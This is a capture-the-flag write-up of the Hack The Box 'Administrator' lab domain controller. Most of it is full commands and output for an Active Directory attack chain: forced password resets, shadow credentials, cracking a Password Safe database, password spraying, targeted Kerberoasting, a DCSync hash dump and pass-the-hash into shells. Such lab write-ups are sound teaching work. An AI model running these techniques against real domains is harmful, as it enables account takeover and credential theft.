Byte JMP
Administrator: ACL Abuse Chain to DCSync

Administrator: ACL Abuse Chain to DCSync

Hack The Box write-up for the Administrator machine. GenericAll over a user chains into password resets through three accounts, FTP access recovers a Password Safe database, cracked credentials land a shell as a fourth user, targeted Kerberoasting via GenericWrite recovers a fifth account, and DCSync extracts the domain administrator's hash.

·14 min read

Initial Reconnaissance – Port Scanning

The box starts with an assumed-breach scenario and provides valid domain credentials:

Username: Olivia
Password: ichliebedich

Service version scan against the target with host discovery disabled:

$ nmap -sV -Pn -T4 10.129.62.187
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-15 23:42 -0300
Nmap scan report for 10.129.62.187
Host is up (0.17s latency).
Not shown: 987 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-09-16 09:42:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Standard domain controller profile: DNS (53), Kerberos (88), RPC (135), SMB (139/445), LDAP (389/636/3268/3269), RPC over HTTP (593), and WinRM (5985). The LDAP banner leaks the domain (administrator.htb) and hostname (DC). FTP (21) on a DC is unusual and worth keeping in mind. Both domain and hostname go into /etc/hosts:

10.129.62.187   administrator.htb dc.administrator.htb

Domain Enumeration

21/tcp – FTP

Anonymous access was denied:

$ ftp 10.129.62.187
Connected to 10.129.62.187.
220 Microsoft FTP Service
Name (10.129.62.187:bytejmp): anonymous
331 Password required
Password:
530 User cannot log in.
ftp: Login failed

Attempting to authenticate as Olivia also failed. The login was accepted, but the home directory was inaccessible:

$ ftp 10.129.62.187
Connected to 10.129.62.187.
220 Microsoft FTP Service
Name (10.129.62.187:bytejmp): Olivia
331 Password required
Password:
530 User cannot log in, home directory inaccessible.
ftp: Login failed

FTP is running, but neither anonymous nor Olivia can use it. This suggests another account has FTP access configured.

445/tcp – SMB with Olivia

Olivia's credentials authenticated successfully against SMB:

$ nxc smb administrator.htb -u 'Olivia' -p 'ichliebedich'
SMB         10.129.62.187   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.62.187   445    DC               [+] administrator.htb\Olivia:ichliebedich

Share enumeration returned only the default shares with no custom or interesting ones exposed:

$ nxc smb administrator.htb -u 'Olivia' -p 'ichliebedich' --shares
SMB         10.129.62.187   445    DC               [+] administrator.htb\Olivia:ichliebedich
SMB         10.129.62.187   445    DC               Share           Permissions     Remark
SMB         10.129.62.187   445    DC               -----           -----------     ------
SMB         10.129.62.187   445    DC               ADMIN$                          Remote Admin
SMB         10.129.62.187   445    DC               C$                              Default share
SMB         10.129.62.187   445    DC               IPC$            READ            Remote IPC
SMB         10.129.62.187   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.62.187   445    DC               SYSVOL          READ            Logon server share

User Enumeration

Pulling the domain user list:

$ nxc smb administrator.htb -u 'Olivia' -p 'ichliebedich' --users
SMB         10.129.62.187   445    DC               -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.129.62.187   445    DC               Administrator                 2024-10-22 18:59:36 0       Built-in account for administering the computer/domain
SMB         10.129.62.187   445    DC               Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.129.62.187   445    DC               krbtgt                        2024-10-04 19:53:28 0       Key Distribution Center Service Account
SMB         10.129.62.187   445    DC               olivia                        2024-10-06 01:22:48 0
SMB         10.129.62.187   445    DC               michael                       2024-10-06 01:33:37 0
SMB         10.129.62.187   445    DC               benjamin                      2024-10-06 01:34:56 0
SMB         10.129.62.187   445    DC               emily                         2024-10-30 23:40:02 0
SMB         10.129.62.187   445    DC               ethan                         2024-10-12 20:52:14 0
SMB         10.129.62.187   445    DC               alexander                     2024-10-31 00:18:04 0
SMB         10.129.62.187   445    DC               emma                          2024-10-31 00:18:35 0

Seven non-default users: olivia, michael, benjamin, emily, ethan, alexander, and emma.

RID brute force confirmed the same list and revealed a custom group called Share Moderators (RID 1111):

$ nxc smb administrator.htb -u 'Olivia' -p 'ichliebedich' --rid-brute
SMB         10.129.62.187   445    DC               500: ADMINISTRATOR\Administrator (SidTypeUser)
SMB         10.129.62.187   445    DC               501: ADMINISTRATOR\Guest (SidTypeUser)
SMB         10.129.62.187   445    DC               502: ADMINISTRATOR\krbtgt (SidTypeUser)
SMB         10.129.62.187   445    DC               512: ADMINISTRATOR\Domain Admins (SidTypeGroup)
SMB         10.129.62.187   445    DC               1108: ADMINISTRATOR\olivia (SidTypeUser)
SMB         10.129.62.187   445    DC               1109: ADMINISTRATOR\michael (SidTypeUser)
SMB         10.129.62.187   445    DC               1110: ADMINISTRATOR\benjamin (SidTypeUser)
SMB         10.129.62.187   445    DC               1111: ADMINISTRATOR\Share Moderators (SidTypeAlias)
SMB         10.129.62.187   445    DC               1112: ADMINISTRATOR\emily (SidTypeUser)
SMB         10.129.62.187   445    DC               1113: ADMINISTRATOR\ethan (SidTypeUser)
SMB         10.129.62.187   445    DC               3601: ADMINISTRATOR\alexander (SidTypeUser)
SMB         10.129.62.187   445    DC               3602: ADMINISTRATOR\emma (SidTypeUser)

Quick Wins That Didn't Work

A username-as-password spray returned STATUS_LOGON_FAILURE for every account:

$ nxc smb administrator.htb -u users.txt -p users.txt --no-brute
SMB         10.129.62.187   445    DC               [-] administrator.htb\Administrator:Administrator STATUS_LOGON_FAILURE
SMB         10.129.62.187   445    DC               [-] administrator.htb\olivia:olivia STATUS_LOGON_FAILURE
SMB         10.129.62.187   445    DC               [-] administrator.htb\michael:michael STATUS_LOGON_FAILURE
SMB         10.129.62.187   445    DC               [-] administrator.htb\benjamin:benjamin STATUS_LOGON_FAILURE
SMB         10.129.62.187   445    DC               [-] administrator.htb\emily:emily STATUS_LOGON_FAILURE
SMB         10.129.62.187   445    DC               [-] administrator.htb\ethan:ethan STATUS_LOGON_FAILURE
SMB         10.129.62.187   445    DC               [-] administrator.htb\alexander:alexander STATUS_LOGON_FAILURE
SMB         10.129.62.187   445    DC               [-] administrator.htb\emma:emma STATUS_LOGON_FAILURE

No low-hanging fruit. Time to map the ACL relationships.

Mapping the Path with BloodHound

I collected the domain graph using RustHound-CE with Olivia's credentials:

$ rusthound-ce -d administrator.htb -u 'Olivia' -p 'ichliebedich'
---------------------------------------------------
Initializing RustHound-CE at 23:51:04 on 09/15/26
Powered by @g0h4n_0
---------------------------------------------------

[2026-09-16T02:51:04Z INFO  rusthound_ce] Collection method: All
[2026-09-16T02:51:05Z INFO  rusthound_ce::transport::ldap] Connected to ADMINISTRATOR.HTB Active Directory!
[2026-09-16T02:51:14Z INFO  rusthound_ce::json::maker::common] 11 users parsed!
[2026-09-16T02:51:14Z INFO  rusthound_ce::json::maker::common] 61 groups parsed!
[2026-09-16T02:51:14Z INFO  rusthound_ce::json::maker::common] 1 computers parsed!

RustHound-CE Enumeration Completed at 23:51:14 on 09/15/26! Happy Graphing!

After importing the data into BloodHound, the full attack path from Olivia to Domain Admin emerged across five users:

Olivia → Michael: Olivia has GenericAll over michael, granting full control over the object, including the ability to change the password or write key credentials.

Michael → Benjamin: Michael has ForceChangePassword over benjamin, allowing a password reset without knowing the current password. Michael is also a member of Remote Management Users, enabling WinRM access.

Benjamin → FTP: Benjamin is a member of the Share Moderators group. As enumeration later confirmed, this account has FTP access.

Emily → Ethan: Emily has GenericWrite over ethan, enabling targeted Kerberoasting by setting an SPN. Emily is also a member of Remote Management Users.

Ethan → Domain: Ethan holds GetChangesInFilteredSet along with replication rights on the domain, enabling DCSync.

Olivia → Michael – GenericAll

BloodHound showing Olivia has GenericAll over Michael

GenericAll is full control over the target object. The most direct abuse is resetting the user's password. While Shadow Credentials (writing msDS-KeyCredentialLink) also works under GenericAll, changing the password is simpler and avoids needing PKINIT tooling.

Before going with the password change, I checked the msDS-KeyCredentialLink attribute on Michael using pywhisker:

$ pywhisker -d "administrator.htb" -u "Olivia" -p "ichliebedich" --target "michael" --action "list"
[*] Searching for the target account
[*] Target user found: CN=Michael Williams,CN=Users,DC=administrator,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

The attribute was empty. I verified the GenericAll write by adding a key credential:

$ pywhisker -d "administrator.htb" -u "Olivia" -p "ichliebedich" --target "michael" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Michael Williams,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 370db851-8862-5af5-ff96-a508b6b219d7
[*] Updating the msDS-KeyCredentialLink attribute of michael
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: WAhlMI1l.pfx
[*] Must be used with password: RSP0TSfCECHIXZVQVZsf
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

Shadow Credentials worked, confirming the write access. Rather than going through the PKINIT chain to recover the NT hash, I took the simpler route and changed Michael's password directly using net rpc password:

$ net rpc password "michael" "newP@ssword2022" -U "administrator.htb"/"Olivia"%"ichliebedich" -S "dc.administrator.htb"

Confirming the new credentials over SMB:

$ nxc smb administrator.htb -u 'michael' -p 'newP@ssword2022'
SMB         10.129.62.187   445    DC               [+] administrator.htb\michael:newP@ssword2022

WinRM as Michael

BloodHound showing Michael is a member of Remote Management Users

BloodHound showed Michael in the Remote Management Users group. NetExec confirmed it:

$ nxc winrm administrator.htb -u 'michael' -p 'newP@ssword2022'
WINRM       10.129.62.187   5985   DC               [+] administrator.htb\michael:newP@ssword2022 (Pwn3d!)

Pwn3d! on WinRM. I connected with evil-winrm:

$ evil-winrm -i administrator.htb -u 'michael' -p 'newP@ssword2022'

Evil-WinRM shell v3.9

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents>

Michael's desktop was empty and the privilege set was standard with nothing exploitable:

*Evil-WinRM* PS C:\Users\michael> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

The escalation path is not through token abuse but through the next ACL edge.

Michael → Benjamin – ForceChangePassword

BloodHound showing Michael has ForceChangePassword over Benjamin

BloodHound showed Michael has ForceChangePassword over Benjamin. This right allows changing the target's password without knowing the current one:

BloodHound ForceChangePassword abuse info

Changing Benjamin's password:

$ net rpc password "benjamin" "newP@ssword2023" -U "administrator.htb"/"michael"%"newP@ssword2022" -S "dc.administrator.htb"

Validating:

$ nxc smb administrator.htb -u 'benjamin' -p 'newP@ssword2023'
SMB         10.129.62.187   445    DC               [+] administrator.htb\benjamin:newP@ssword2023

Benjamin's SMB share access was the same default set as everyone else:

$ nxc smb administrator.htb -u 'benjamin' -p 'newP@ssword2023' --shares
SMB         10.129.62.187   445    DC               Share           Permissions     Remark
SMB         10.129.62.187   445    DC               -----           -----------     ------
SMB         10.129.62.187   445    DC               ADMIN$                          Remote Admin
SMB         10.129.62.187   445    DC               C$                              Default share
SMB         10.129.62.187   445    DC               IPC$            READ            Remote IPC
SMB         10.129.62.187   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.62.187   445    DC               SYSVOL          READ            Logon server share

No additional readable shares. But Benjamin is a member of Share Moderators, and that FTP service from the initial scan had not been accessible yet:

BloodHound showing Benjamin is a member of Share Moderators

Testing FTP:

$ nxc ftp administrator.htb -u 'benjamin' -p 'newP@ssword2023'
FTP         10.129.62.187   21     administrator.htb [+] benjamin:newP@ssword2023

Benjamin can authenticate to FTP.

FTP – Password Safe Database

Connecting via FTP revealed a single file:

$ ftp 10.129.62.187
Connected to 10.129.62.187.
220 Microsoft FTP Service
Name (10.129.62.187:bytejmp): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||52842|)
125 Data connection already open; Transfer starting.
10-05-24  09:13AM                  952 Backup.psafe3

Backup.psafe3 is a Password Safe database. I downloaded it:

ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||52843|)
125 Data connection already open; Transfer starting.
100% |*******************************|   952        5.49 KiB/s    00:00 ETA
226 Transfer complete.
952 bytes received in 00:00 (5.49 KiB/s)

Cracking the Master Password

Password Safe v3 databases map to hashcat mode 5200. Running it against rockyou.txt:

$ hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt

It cracked almost instantly:

Backup.psafe3:tekieromucho

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: Backup.psafe3
Speed.#01........:    87152 H/s (8.67ms) @ Accel:338 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5408/14344385 (0.04%)

Master password: tekieromucho.

Extracting Stored Credentials

Opening the database in Password Safe revealed three entries:

Password Safe master password entry

Password Safe entries for alexander, emily, and emma

Alexander Smith [alexander] — UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
Emily Rodriguez [emily]     — UXLCI5iETUsIBoFVTj8yQFKoHjXmb
Emma Johnson [emma]         — WwANQWnmJnGV07WQN8bMS7FMAbjNur

Password Spraying the Recovered Credentials

With three passwords and a full user list, I sprayed all combinations:

$ nxc smb administrator.htb -u users.txt -p pass.txt --continue-on-success
SMB         10.129.62.187   445    DC               [-] administrator.htb\Administrator:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB         10.129.62.187   445    DC               [-] administrator.htb\olivia:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
...
SMB         10.129.62.187   445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
...
SMB         10.129.62.187   445    DC               [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
SMB         10.129.62.187   445    DC               [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE

Only one hit: emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb. The passwords stored for alexander and emma in the Password Safe database did not match their current domain passwords, likely rotated since the backup was taken.

User Flag

BloodHound showing Emily is a member of Remote Management Users

Emily is in the Remote Management Users group, so WinRM is the way in:

$ evil-winrm -i administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Evil-WinRM shell v3.9

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Desktop>
*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
45e474bc6a5165d5aff65f3124bf3a64

Emily → Ethan – Targeted Kerberoasting

BloodHound showing Emily has GenericWrite over Ethan

BloodHound showed Emily has GenericWrite over ethan. GenericWrite allows modifying most attributes on the target object, including servicePrincipalName. Setting an SPN on a user that doesn't have one enables Kerberoasting against that account, a technique known as targeted Kerberoasting.

targetedKerberoast.py automates the process: it sets a temporary SPN on the target, requests a TGS, saves the hash, and removes the SPN.

First Attempt – Clock Skew

$ python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

The KDC rejected the request because the local clock drifted more than five minutes from the DC. Checking the offset:

$ ntpdate -q administrator.htb
2026-09-16 08:08:50.543385 (-0300) +25189.205627 +/- 0.079018 administrator.htb 10.129.62.187 s1 no-leap

Over 25,000 seconds of drift (roughly 7 hours).

Second Attempt – Using faketime

Rather than modifying the system clock, I used faketime to offset the process clock by the measured drift:

$ faketime -f "+25189s" python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$07864fed0e1c226a...8057
[VERBOSE] SPN removed successfully for (ethan)

The tool set a temporary SPN on ethan, requested a TGS encrypted with Ethan's password hash, and cleaned up the SPN afterward.

Cracking the TGS Hash

The $krb5tgs$23$ prefix maps to hashcat mode 13100:

$ hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$07864fed0e1c226a...8057:limpbizkit

Cleartext credentials recovered: ethan / limpbizkit.

Confirming over SMB:

$ nxc smb administrator.htb -u 'ethan' -p 'limpbizkit'
SMB         10.129.62.187   445    DC               [+] administrator.htb\ethan:limpbizkit

Privilege Escalation – DCSync

BloodHound showing Ethan has GetChangesInFilteredSet on the domain

BloodHound showed Ethan has GetChangesInFilteredSet along with the replication rights required for DCSync on the ADMINISTRATOR.HTB domain object. DCSync abuses the Directory Replication Service (DRSUAPI) protocol: any principal with these rights can ask the DC to replicate secrets, including every account's NT hash, without executing code on the domain controller.

BloodHound DCSync abuse info

Dumping Domain Hashes with secretsdump

impacket-secretsdump performs the DCSync. The initial rpc_s_access_denied on RemoteOperations is expected, as that's the attempt to pull local SAM/LSA secrets requiring local admin. The DRSUAPI method succeeds:

$ impacket-secretsdump -outputfile 'dcsync' -dc-ip '10.129.62.187' 'administrator.htb'/'ethan':'limpbizkit'@'dc.administrator.htb'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:fb54d1c05e301e024800c6ad99fe9b45:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:9245632c3e660c0193dc9da327af0d5b:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
...
[*] Cleaning up...

Full domain dump. The Administrator NT hash is 3dc553ce4b9fd20bd016e098d2d2fd2e.

Root Flag

Pass-the-hash over WinRM as Administrator:

$ evil-winrm -i administrator.htb -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'

Evil-WinRM shell v3.9

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f680354e645b20ebe0dacd7b90e2d095

Full domain compromise. The chain started with Olivia's provided credentials and escalated through five user pivots, each driven by an ACL misconfiguration: GenericAll to reset Michael's password, ForceChangePassword to take over Benjamin, FTP access to recover a Password Safe backup, cracked credentials to land a shell as Emily, GenericWrite for targeted Kerberoasting against Ethan, and DCSync rights to dump every hash in the domain.

References

  1. The Hacker Recipes – ForceChangePassword: Abusing the right to reset a user's password without knowing the current one.
  2. The Hacker Recipes – Targeted Kerberoasting: Setting SPNs via GenericWrite for offline password cracking.
  3. The Hacker Recipes – DCSync: Abusing replication rights to dump domain credentials.
  4. pywhisker: Shadow Credentials manipulation via msDS-KeyCredentialLink.
  5. targetedKerberoast: Automated targeted Kerberoasting tool.
  6. Impacket – secretsdump: DCSync and credential dumping.
  7. RustHound-CE: Rust-based BloodHound collector.
  8. Evil-WinRM: WinRM shell tool.